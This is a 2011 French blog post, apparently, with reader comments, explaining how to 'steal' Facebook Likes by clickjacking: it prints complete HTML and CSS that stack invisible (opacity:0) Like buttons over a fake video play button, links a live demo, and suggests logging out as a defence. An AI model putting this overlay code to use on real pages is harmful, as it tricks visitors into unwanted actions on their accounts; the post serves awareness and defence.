Comment voler des « Like » sur Facebook

Posted: 6th mars 2011 by Jérémy Levallois in PHP-SQL
Tags: , , , , , , , ,
6
Thumbs up

Thumbs up by TinaOable

Avant toute chose, cet article à pour but d’informer les utilisateurs de Facebook des dangers que ce dernier laisse passer.

Vous avez regardé une vidéo qu’un de vos contacts à mis sur Facebook, et étrangement vous avez « aimé » la vidéo sans le vouloir ?
Je vais vous montrer comment vous pouvez très facilement voler des « Like » de vos liens sur Facebook.

Facebook autorise les développeurs web à utiliser un plugin social qui permet d’interagir, depuis un site extérieur, à votre compte Facebook.
Cela va du Bouton Like, aux commentaires directs utilisant votre véritable nom et prénom !

Maintenant, en utilisant une faille à ce système, il est possible de cacher aux visiteurs des boutons Like.
Pour se faire, il faut avec un zone où les utilisateurs devront cliquer, par exemple le bouton play d’une fausse vidéo. C’est cet exemple que je vais montrer.

Cliquez ici pour voir l’exemple. Si vous cliquez sur le boutons Play, vous pourrez voir sur votre compte Facebook que vous aimez la page http://www.karganys.fr/php/comment-voler-des-like-sur-facebook
Tant que vous ne cliquerez pas sur le bouton Play, il ne se passera rien sur votre compte Facebook, n’ayez pas peur :)

Regardons plus en détail le code source :

  1. <html>
  2.         <head>
  3.                 <link rel="stylesheet" href="mycss.css" type="text/css">
  4.         </link></head>
  5.         <body>
  6.                 <div id="play_img">
  7.                         <div style="width:120px;height:115px;opacity:0">
  8.                                 <div style="width:56px;height:115px;margin-left:7px;float:left">
  9.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  10.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  11.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  12.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  13.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  14.                                 </div>
  15.  
  16.                                 <div style="width:57px;height:115px;float:left">
  17.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  18.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  19.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  20.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  21.                                         <script src="http://connect.facebook.net/fr_FR/all.js#xfbml=1"></script><fb:like href="http://www.karganys.fr/php/comment-voler-des-like-sur-facebook" layout="button_count" show_faces="true" font="tahoma"></fb:like>
  22.                                 </div>
  23.                         </div>
  24.                 </div>
  25.         </body>
  26. </html>

et le css associé

  1. #play_img{width:124px;height:111px;padding-top:4px;margin-left:248px;margin-top:135px;background:url(‘play.png’) no-repeat top left}

Les balises script affichent un bouton Like avec en paramètre la page à aimer. Nous surchargeons l’image avec des boutons Like.
Ensuite, nous cachons toutes les images des boutons Like avec l’attribut CSS opacity:0, ce qui le rend « invisible » à l’œil, mais toujours présent.

Vous pouvez voir ici la même page, mais sans l’attribut opacity

Cette faille est utilisée par quelques sites, comme AmbianceBuzz.net qui, soit dit en passant, averti en bas de sa page

Le bouton lecture de nos vidéos peut éventuellement partager notre vidéo à vos amis sur Facebook

Comment contourner ça ? Pour l’instant, la seule solution possible est de se déconnecter de Facebook dès lors que l’on ne l’utilise plus.
Ou encore mieux : Fermer son compte Facebook

Source : Code source d’AmbianceBuzz.net

  1. Yohann dit :
    6 mars 2011 à 21 h 04 min

    Salut,
    J’ai mis une solution sur mon site pour éviter ça (et je t’ai cité au passage :) ) : http://yohann.prigents.com/technologeek/article/les-voleurs-de-like-agissent

    Merci pour ces explications !

    Répondre
  2. LorrisV dit :
    7 avril 2011 à 9 h 51 min

    Intéressant il faut toujours se déconnecter de Facebook :)
    Merci pour l’info.

    Répondre
  3. D.A. dit :
    16 mai 2011 à 13 h 36 min

    J’ai déjà été confronté à ce type de site. Heureusement, j’ai NoScript installé sur mon navigateur Firefox (il ne me semble pas qu’il existe sur Chromium…) qui m’a averti d’une tentative de script croisés ou masqué (je sais plus exactement comment il appelle ça), bref, ça m’a éviter de partager un « j’aime » d’une vidéo sans intérêt.
    NoScript est un peu contraignant (il faut autoriser tous les nouveaux scripts un par un jusqu’à ce que le site s’affiche correctement), mais niveau sécurisation, il m’a l’air au top. (Combiné avec WOT, c’est encore mieux)

    Depuis, j’ai également bloqué les boutons « J’aime » extérieurs au site Facebook avec Ad Block Plus (ça existe sur Chromium aussi, mais j’ai l’impression qu’il filtre moins bien sur ce navigateur…).
    Enfin bref, avec les bons modules complémentaires, on peut éviter ce genre de désagréments.
    Il existe également le module WOT (sur Firefox et Chromium) qui donne rapidement une idée de la confiance à accorder à un site ou un lien (enfin bon, la première fois où j’ai été confronté au « J’aime » caché, le site n’avait pas encore eu d’évaluation WOT… donc heureusement que j’avais aussi NoScript d’installé).

    Répondre
  4. michel dit :
    29 juin 2011 à 17 h 05 min

    bonjour,
    merci pour ce super post ! je suis tombé dessus en cherchant un script qui oblige les visiteurs à cliquer sur J’AIME pour voir une vidéo. Est ce que quelqu’un peut me dire quel script écrire dans un code html ou php de page web contenant une vidéo pour qu’on soit opbligé de cliquer J’AIME pour lancer la vidoé ( en toute transparence, je ne veux pas « voler » de j’aime ) ! merci pour les infos ( j’avais trouvé ça, mais je n’arrive pas à faire fonctionner :

    FB.Event.subscribe(‘edge.create’, function(href, widget) {
    rediriger vers la page de la video
    });

    merci. michel

    Répondre
  5. Guillaume dit :
    1 septembre 2011 à 12 h 21 min

    Bonjour,

    Merci pour votre aide. Savez-vous comment faire pour que la page s’actualise une fois que la personne a cliqué sur like ?

    Merci

    Répondre
  6. test | DFCO Streaming dit :
    11 novembre 2011 à 1 h 21 min

    [...] test novembre 11th, 2011 MrChou Tweet WARNING ! This is an example How to use a Facebook Like Button Flaw ! By cliking on Play button, and if you are logged into Facebook, it will make liking this page. ATTENTION ! Ceci est un exemple de Comment utiliser la faille du bouton Like de Facebook ! En cliquant sur le bouton Play, et si vous êtes connecté à Facebook, ceci vous fera aimer cette page. Please click here for more information. [...]

    Répondre